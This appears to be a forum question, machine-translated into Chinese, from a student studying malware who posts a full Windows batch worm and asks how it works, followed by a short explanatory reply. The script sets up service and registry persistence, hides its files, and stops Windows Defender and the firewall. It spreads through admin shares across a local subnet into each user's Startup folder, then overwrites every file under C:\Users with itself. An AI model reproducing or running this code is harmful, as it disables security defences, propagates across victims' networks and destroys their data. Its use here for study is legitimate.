1
@echo off
SET i=0
SET "NomeProcesso=DaMonki.exe"
SET "NomeService=DaMonki"
rem <=== run as service ===>
echo sc create %NomeService% binpath=%0 > service.bat
echo sc start %NomeService% >> service.bat
attrib +h +r +s service.bat
start service.bat
rem <=== startup registry ===>
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
attrib +h +r +s %0
rem <=== kill firewall and windows defender ===>
net stop "Windows Defender Service"
net stop "Windows Firewall"
rem <=== INFECT NETWORK!!! ===>
:Worm
net use Z: \\192.168.1.%i%\C$
if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
mountvol Z: /d)
if %i% == 256 (goto Infect) else (set /a i=i+1)
goto Worm
rem <=== infect *.* in C:\Users ===>
:Infect
for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)
for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)
我學習關於我的TCC的惡意軟件和惡意程序,而且我發現這個批次樣品蠕蟲病毒,我能理解大部分的代碼,但我不明白的"Infect Network"和"Infect *.* in C:\Users"線。這個「批蟲」是如何工作的?
這些行對我的電腦有什麼作用?它會簡單地「感染」這些文件或將會毀掉它們?這種蠕蟲只會在受害者網絡中傳播嗎?這個代碼有什麼限制?殺毒軟件如何阻止它?
如果您有一些好的惡意軟件/軟件工程電子書和論文,請在評論中留下鏈接。
對不起,我沒有流利的這種語言。
不要使用此代碼懷有惡意!
批處理將自身添加到註冊表中,以便在系統引導時將其啓動,並將其自身填充到每個用戶的開始菜單中,以便在THEY登錄時運行,然後嘗試對本地網絡中的每臺機器都做同樣的事情。 –